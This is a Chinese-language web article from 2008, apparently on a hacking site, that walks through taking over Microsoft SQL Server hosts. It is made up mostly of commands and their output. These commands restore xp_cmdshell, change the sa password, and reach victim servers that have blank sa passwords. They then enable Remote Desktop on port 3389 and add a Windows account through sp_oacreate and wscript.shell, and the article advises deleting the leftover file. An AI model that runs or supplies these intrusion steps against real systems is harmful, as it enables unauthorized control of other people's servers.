sql连接器:SQL恢复XPCMDSHLL,用SQL连接器...来源: 发布时间:星期日, 2008年10月19日 浏览:132次 评论:0
用SQL连接器恢复XP_CMDSHLLE的命令
(1)SQL Query Analyzer sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’ (2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入 sp_addextendedproc ’xp_cmdshell’,’xpsql70.dll’ 去除 sp_dropextendedproc ’xp_cmdshell’ (3)MSSQL2000 sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’ 修改sa密码 sp_password @old = null, @new = ’complexpwd’, @loginame =’sa’ 这个很简单,自己堵后门用:) 二,在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的 实例过程: 连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机 命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389 执行成功,结果: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect 命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的 执行成功,结果: 命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入 执行成功,结果: 命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确 执行成功,结果: [Components] TsEnable = on TsEnable = on 命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!! 执行成功,结果: GetLocalManagedApplications returned (2) 之后就看大家的了,不过要记得册除新建的duguxike文件哦!! 三不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效 declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user gchn aaa /add’-- 如果XPCMDSHLL被删了第一条恢复 第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功) 第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23 才好用 0
相关文章
读者评论
发表评论 |